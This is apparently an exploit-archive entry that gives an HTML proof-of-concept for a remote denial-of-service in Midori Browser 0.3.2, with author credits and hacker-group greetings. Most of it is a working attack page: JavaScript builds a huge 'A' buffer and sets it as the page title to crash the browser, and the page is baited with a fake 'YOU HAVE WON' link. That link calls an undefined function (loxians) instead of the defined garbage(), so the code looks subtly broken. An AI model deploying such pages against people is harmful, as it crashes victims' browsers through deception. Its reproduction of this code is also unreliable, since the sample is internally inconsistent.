Midori Browser version 0.3.2 suffers from a denial of service vulnerability.
deb589c219ec48802776ce4086a3f468b0a54ffa47bd8d8841912deec989fbad
/*
GGGGGG\
GG __GG\
GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\
GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\
GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee |
GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____|
\GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\
\______/ \_______|\__| \_______| \____gg | \_______|
gg\ gg |
gggggg |
Info-sec forum: http://garage4hackers.com
[+] Midori Browser v0.3.2 Remote Denial of Service
[+] Author: Prashant a.k.a t3rm!n4t0r
[+] C0ntact: happyterminator@gmail.com
[+] Platform: *nix
[+] Tested on: Ubuntu 11.04
[+] Special Greets to: "vinnu", b0nd, shreyas, secfence team
[+] Greets to: Eby, punter, fb1h2s, the_empty, RD(Xer0) warrior,
abhaythehero,d3c0d3r all hackers garage crew :)
*/
<html>
<head>
<title>Midori Browser v0.3.2 Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function garbage() {
var buffer = "";
for (var i = 0; i < 8000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 8000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON ! CLICK HERE!!</a></font></h2>
</body>
</html>